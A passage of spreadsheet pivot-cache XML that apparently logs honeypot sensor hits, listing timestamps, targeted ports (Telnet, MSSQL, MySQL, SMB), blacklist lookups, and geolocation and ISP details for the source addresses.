    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bffd:3165"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2585"/>
    <x v="2585"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:48:40"/>
    <d v="2025-04-08T15:48:40"/>
    <d v="2025-04-08T15:48:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:87d5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2586"/>
    <x v="2586"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:44:41"/>
    <d v="2025-03-05T10:22:36"/>
    <d v="2025-04-08T15:44:41"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2000-01-13"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d01:8098"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2587"/>
    <x v="2587"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:36:08"/>
    <d v="2025-04-08T15:34:55"/>
    <d v="2025-04-08T15:36:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext FRA"/>
    <s v="1994-11-30"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a996:c912"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2588"/>
    <x v="2588"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:29:54"/>
    <d v="2025-04-08T15:28:53"/>
    <d v="2025-04-08T15:29:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="JH"/>
    <s v="Jharkhand"/>
    <s v="Dhanbad"/>
    <s v="Sijua"/>
    <s v="1256335"/>
    <s v="NA"/>
    <s v="23.7762"/>
    <s v="86.3303"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1994-08-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:92f9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2589"/>
    <x v="2589"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:27:03"/>
    <d v="2025-04-08T02:55:03"/>
    <d v="2025-04-08T15:27:03"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:85ef"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2590"/>
    <x v="2590"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T14:59:00"/>
    <d v="2025-04-08T14:59:00"/>
    <d v="2025-04-08T14:59:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Mokpo-si"/>
    <s v="Mokpo-si"/>
    <s v="1841063"/>
    <s v="530-420"/>
    <s v="34.799"/>
    <s v="126.389"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Jeonnambonbujang"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3df:3422"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2591"/>
    <x v="2591"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T14:50:45"/>
    <d v="2025-01-02T21:42:40"/>
    <d v="2025-04-08T14:50:45"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Kapurthala"/>
    <s v="Phagwāra"/>
    <s v="1259827"/>
    <s v="NA"/>
    <s v="31.2245"/>
    <s v="75.7739"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="business"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2005-08-03"/>
    <s v="BHARTI-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d10:bde8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2592"/>
    <x v="2592"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T14:28:40"/>
    <d v="2025-04-08T14:27:03"/>
    <d v="2025-04-08T14:28:40"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:d2a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2593"/>
    <x v="2593"/>
    <s v="115-37-186-225.area7b.commufa.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-08T13:43:22"/>
    <d v="2025-04-05T17:35:56"/>
    <d v="2025-04-08T13:43:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="46"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="23"/>
    <s v="Aichi"/>
    <s v="Nagoya"/>
    <s v="Nagoya"/>
    <s v="1856057"/>
    <s v="NA"/>
    <s v="35.1814"/>
    <s v="136.907"/>
    <s v="18126"/>
    <s v="Chubu Telecommunications Company, Inc."/>
    <s v="Chubu Telecommunications Company, Inc."/>
    <s v="business"/>
    <s v="Chubu Telecommunications Co., Inc."/>
    <s v="2008-07-08"/>
    <s v="commufa"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7325:bae1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2594"/>
    <x v="2594"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T13:38:55"/>
    <d v="2024-11-22T15:44:51"/>
    <d v="2025-04-08T13:38:55"/>
    <n v="85"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9846"/>
    <s v="77.5973"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="ACT Fibernet"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="2011-03-24"/>
    <s v="CABLELITE"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,51176)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,51182)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,51549)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,53290)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,53304)}&amp;&amp;{Data_SMB:Incoming connection (106.51.101.238,61719)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a33:65ee"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2595"/>
    <x v="2595"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T13:38:20"/>
    <d v="2025-04-07T23:37:45"/>
    <d v="2025-04-08T13:38:20"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MS"/>
    <s v="Mato Grosso do Sul"/>
    <s v="Campo Grande"/>
    <s v="Campo Grande"/>
    <s v="3467747"/>
    <s v="NA"/>
    <s v="-20.4428"/>
    <s v="-54.6464"/>
    <s v="18881"/>
    <s v="TELEFÔNICA BRASIL S.A"/>
    <s v="TELEFÔNICA BRASIL S.A"/>
    <s v="residential"/>
    <s v="Global Village Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b3b9:59c0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2596"/>
    <x v="2596"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T13:23:34"/>
    <d v="2025-03-12T13:47:23"/>
    <d v="2025-04-08T13:23:34"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H47"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Narsingdi"/>
    <s v="Narsingdi"/>
    <s v="1185117"/>
    <s v="NA"/>
    <s v="23.935"/>
    <s v="90.7234"/>
    <s v="38493"/>
    <s v="Royal Green Communication Limited"/>
    <s v="Royal Green Limited"/>
    <s v="business"/>
    <s v="Royal Green Limited"/>
    <s v="2020-06-02"/>
    <s v="ROYALGREENINC-BD"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,64707)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,64711)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,49235)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,63671)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,63678)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.151.212.110,64546)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6797:d46e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2597"/>
    <x v="2597"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T13:01:14"/>
    <d v="2025-04-08T13:01:14"/>
    <d v="2025-04-08T13:01:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Kukatpally"/>
    <s v="1265767"/>
    <s v="NA"/>
    <s v="17.4849"/>
    <s v="78.4138"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7362:c112"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2598"/>
    <x v="2598"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:51:47"/>
    <d v="2025-04-08T03:01:40"/>
    <d v="2025-04-08T12:51:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:5bbf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2599"/>
    <x v="2599"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:49:00"/>
    <d v="2023-08-03T20:08:00"/>
    <d v="2025-04-08T12:49:00"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="36776&amp;&amp;3306&amp;&amp;1433&amp;&amp;5718&amp;&amp;28607"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="146"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="RAILTEL"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca8c:8304"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2600"/>
    <x v="2600"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:44:15"/>
    <d v="2025-04-07T18:55:31"/>
    <d v="2025-04-08T12:44:15"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Palakkad"/>
    <s v="Palakkad"/>
    <s v="1260728"/>
    <s v="NA"/>
    <s v="10.7732"/>
    <s v="76.6537"/>
    <s v="55836"/>
